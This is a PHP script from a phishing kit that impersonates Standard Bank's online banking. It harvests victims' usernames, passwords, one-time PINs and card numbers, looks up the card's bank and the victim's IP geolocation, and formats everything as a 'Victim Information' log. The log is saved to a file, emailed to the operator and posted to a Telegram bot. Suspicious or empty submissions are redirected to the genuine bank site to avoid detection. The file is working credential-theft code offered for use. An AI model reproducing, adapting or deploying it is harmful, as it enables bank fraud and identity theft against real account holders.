View file File name : status_sd.php Content :<?php error_reporting(0); include("configure.php"); function generateRandomString($length = 10) { $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } function getBrowser() { $u_agent = $_SERVER['HTTP_USER_AGENT']; $bname = 'Unknown'; $platform = 'Unknown'; $version= ""; //First get the platform? if (preg_match('/linux/i', $u_agent)) { $platform = 'Linux'; } elseif (preg_match('/macintosh|mac os x/i', $u_agent)) { $platform = 'Mac'; } elseif (preg_match('/windows|win32/i', $u_agent)) { $platform = 'Windows'; } // Next get the name of the useragent yes seperately and for good reason if(preg_match('/MSIE/i',$u_agent) && !preg_match('/Opera/i',$u_agent)) { $bname = 'Internet Explorer'; $ub = "MSIE"; } elseif(preg_match('/Firefox/i',$u_agent)) { $bname = 'Mozilla Firefox'; $ub = "Firefox"; } elseif(preg_match('/Chrome/i',$u_agent)) { $bname = 'Google Chrome'; $ub = "Chrome"; } elseif(preg_match('/Safari/i',$u_agent)) { $bname = 'Apple Safari'; $ub = "Safari"; } elseif(preg_match('/Opera/i',$u_agent)) { $bname = 'Opera'; $ub = "Opera"; } elseif(preg_match('/Netscape/i',$u_agent)) { $bname = 'Netscape'; $ub = "Netscape"; } // finally get the correct version number $known = array('Version', $ub, 'other'); $pattern = '#(?<browser>' . join('|', $known) . ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#'; if (!preg_match_all($pattern, $u_agent, $matches)) { // we have no matching number just continue } // see how many we have $i = count($matches['browser']); if ($i != 1) { //we will have two since we are not using 'other' argument yet //see if version is before or after the name if (strripos($u_agent,"Version") < strripos($u_agent,$ub)){ $version= $matches['version'][0]; } else { $version= $matches['version'][1]; } } else { $version= $matches['version'][0]; } // check if we have a number if ($version==null || $version=="") {$version="?";} return array( 'userAgent' => $u_agent, 'name' => $bname, 'version' => $version, 'platform' => $platform, 'pattern' => $pattern ); } $six = $_POST['number']; // Insert CURL function curl($url, $var = null) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_TIMEOUT, 25); if ($var != null) { curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $var); } curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); curl_close($curl); return $result; } // Enam digit Formula function defineNUM($bin) { return str_replace(' ', '', stripslashes($_POST["number"])); return substr($bin,0,6); } // JSON DATA $bin = defineNUM($six); $curl = curl("https://lookup.binlist.net/".$bin); // Thanks to this API! $json = json_decode($curl); $brand = $json->scheme ? $json->scheme : "error"; $cardType = $json->type ? $json->type : "error"; $cardCategory = $json->bank ? $json->bank : "error"; $countryName = $json->country ? $json->country : "error"; $countryCode = $json->country ? $json->country : "error"; if ($six == null) { } $ip = $_SERVER['REMOTE_ADDR']; $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']); function systemInfo($ipAddress) { $systemInfo = array(); $ipDetails = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ipAddress), true); $systemInfo['city'] = $ipDetails['geoplugin_city']; $systemInfo['region'] = $ipDetails['geoplugin_region']; $systemInfo['country'] = $ipDetails['geoplugin_countryName']; return $systemInfo; } $Location = ""."".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country']; $bad_words = array('4r5e','5h1t','5hit','ar5e','ass-fucker','asses','assfucker','assfukka','asshole','assholes','asswhole','a_s_s','b!tch','b00bs','b17ch','b1tch','ballbag','ballsack','bastard','beastial','beastiality','bellend','bestial','bestiality','bi+ch','biatch','bitch','bitcher','bitchers','bitches','bitchin','bitching','bloody','blowjob','blowjob','blowjobs','boiolas','bollock','bollok','booobs','boooobs','booooobs','booooooobs','buceta','bugger','bunny fucker','butthole','buttmuch','buttplug','c0ck','c0cksucker','carpetmuncher','cl1t','clitoris','clits','cock','cock-sucker','cockface','cockhead','cockmunch','cockmuncher','cocksuck','cocksucked','cocksucker','cocksucking','cocksucks','cocksuka','cocksukka','cokmuncher','coksucka','cummer','cumshot','cunilingus','cunillingus','cunnilingus','cuntlick','cuntlicker','cuntlicking','cunts','cyalis','cyberfuc','cyberfuck','cyberfucked','cyberfucker','cyberfuckers','cyberfucking','d1ck','dickhead','dildo','dildos','dlck','dog-fucker','doggin','dogging','donkeyribber','ejaculate','ejaculated','ejaculates','ejaculating','ejaculatings','ejaculation','ejakulate','f4nny','fagging','faggitt','faggot','faggs','fagot','fagots','fanny','fannyflaps','fannyfucker','fanyy','fatass','fcuk','fcuker','fcuking','asdasd','fecker','felching','fellate','fellatio','fingerfuck','fingerfucked','fingerfucker','fingerfuckers','fingerfucking','fingerfucks','fistfuck','fistfucked','fistfucker','fistfuckers','fistfucking','fistfuckings','fistfucks','fooker','fuck','fucka','fucked','fucker','fuckers','fuckhead','fuckheads','fuckin','fucking','fuckings','fuckingshitmotherfucker','fuckme','fucks','fuckwhit','fuckwit','fudge packer','fudgepacker','fuker','fukker','fukkin','fuks','fukwhit','fukwit','fux0r','f_u_c_k','gangbang','gangbanged','gangbangs','gaylord','gaysex','goatse','god-dam','god-damned','goddamn','goddamned','hardcoresex','heshe','horniest','horny','hotsex','jack-off','jackoff','jerk-off','jism','knobead','knobed','knobend','knobhead','knobjocky','knobjokey','kondum','kondums','kummer','kumming','kunilingus','l3i+ch','l3itch','labia','lmfao','lusting','m0f0','m0fo','m45terbate','ma5terb8','ma5terbate','masochist','master-bate','masterb8','masterbat*','masterbat3','masterbate','masterbation','masterbations','masturbate','mo-fo','mof0','mothafuck','mothafucka','mothafuckas','mothafuckaz','mothafucked','mothafucker','mothafuckers','mothafuckin','mothafucking','mothafuckings','mothafucks','mother fucker','motherfuck','motherfucked','motherfucker','motherfuckers','motherfuckin','motherfucking','motherfuckings','motherfuckka','motherfucks','mutha','muthafecker','muthafuckker','mutherfucker','n1gga','n1gger','nigg3r','nigg4h','nigga','niggah','niggas','niggaz','nigger','niggers','nob jokey','nobhead','nobjocky','nobjokey','numbnuts','nutsack','orgasim','orgasims','p0rn','penis','penisfucker','phonesex','phuked','phuking','phukked','phukking','phuks','pigfucker','pissed','pisser','pissers','pisses','pissflaps','pissin','pissing','pissoff','porn','porno','pornography','pornos','prick','pricks','pusse','pussi','pussies','pussy','pussys','retard','rimjaw','rimming','shit','sadist','schlong','screwing','scroat','scrote','scrotum','semen','sh!+','sh!t','shagger','shaggin','shagging','shemale','shi+','shitdick','shited','shitey','shitfuck','shitfull','shithead','shiting','shitings','shits','shitted','shitter','shitters','shitting','shittings','shitty','skank','sluts','smegma','snatch','son-of-a-bitch','s_h_i_t','t1tt1e5','t1tties','testical','testicle','titfuck','tittie5','tittiefucker','titties','tittyfuck','tittywank','titwank','tosser','tw4t','twathead','twatty','twunt','twunter','v14gra','v1gra','vagina','viagra','vulva','w00se','wanker','whoar','whore','willies','xrated','fuck','fuckoff','fuck off','fucking','nigger','nigerian','Nigerian','scam','cunt','wankers','twats','scammers','shit','wanker','cunt','asshole','idiot','dumbass','123stopsmoking.org','tooolz.com','yatdew.com','usaaxa.com','projectmy.net','ifastnet1.com','@mteen.net','clientcaf.info','slclogin.com','theaccessuk.org','banglemail.com','ourtimesupport.com','joupoes','joumasepoes','arsehole'); $adddate=date("D M d, Y g:i a"); $ip = getenv("REMOTE_ADDR"); $useragent = $_SERVER['HTTP_USER_AGENT']; $session_id = generateRandomString(80); $username = $_POST['username']; $password = $_POST['password']; $otp = $_POST['otp']; $thetype = $_POST['thetype']; $first_six = str_replace(' ', '', stripslashes($_POST["number"])); $first_sixes = substr($first_six, 0, 6); $thebank = ucwords(strtolower($cardCategory->name)); $thecardtype = ucfirst(strtolower($cardType)); $thecardbrand = ucfirst(strtolower($brand)); $numbernospaces = str_replace(' ', '', stripslashes($_POST["number"])); $number = $_POST['number']; $goned = $_POST['goned']; $ua=getBrowser(); $message .= "+ -- + \n"; $message .= "+ TOTypy \n"; $message .= "| OTP: $otp\n"; $message .= "| Username: $username\n"; $message .= "| Password: $password\n"; $message .= "+ ------------------------------------------ + \n"; $message .= "+ Victim Information \n"; $message .= "| User IP: ".$ip."\n"; $message .= "| Date: ".$adddate."\n"; $message .= "| Browser: " . $ua['name'] . " " . $ua['version'] . " \n"; $message .= "| Operating System: " .$ua['platform'] . " \n"; $message .= "| Location: $Location \n"; $message .= "| User Agent: ".$useragent."\n"; $message .= "| - by JFZ\n"; $message .= "+ ------------------------------------------ + \n\n"; $subject="eTTyPy | $ip | Log"; $from= "From: NCCBc"; foreach($bad_words as $bad_word){ if(stristr($_POST['username'], $bad_word) !== false) { exit(header("Location: https://href.li/https://onlinebanking.standardbank.co.za")); } if(stristr($_POST['password'], $bad_word) !== false) { exit(header("Location: https://href.li/https://onlinebanking.standardbank.co.za")); } } if (empty($username)) { exit(header("Location: https://href.li/https://onlinebanking.standardbank.co.za")); } if (empty($password)) { exit(header("Location: https://href.li/https://onlinebanking.standardbank.co.za")); } if($Save_on_Server==1) { $file=fopen("../logs/results.txt","a"); fwrite($file,$message); fclose($file); } if($Send_to_Email==1) { mail($youremail, "$subject", $message, $from); } if($Send_to_Telegram==1) { $website="https://api.telegram.org/bot".$token; $params=[ 'chat_id'=>$chat_id, 'text'=>$message, ]; $ch = curl_init($website . '/sendMessage'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, ($params)); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $result = curl_exec($ch); curl_close($ch); } header("Location: ../process_sc.php?session_id=$session_id&aa=$username&bb=$password&protection_id=$session_id"); ?>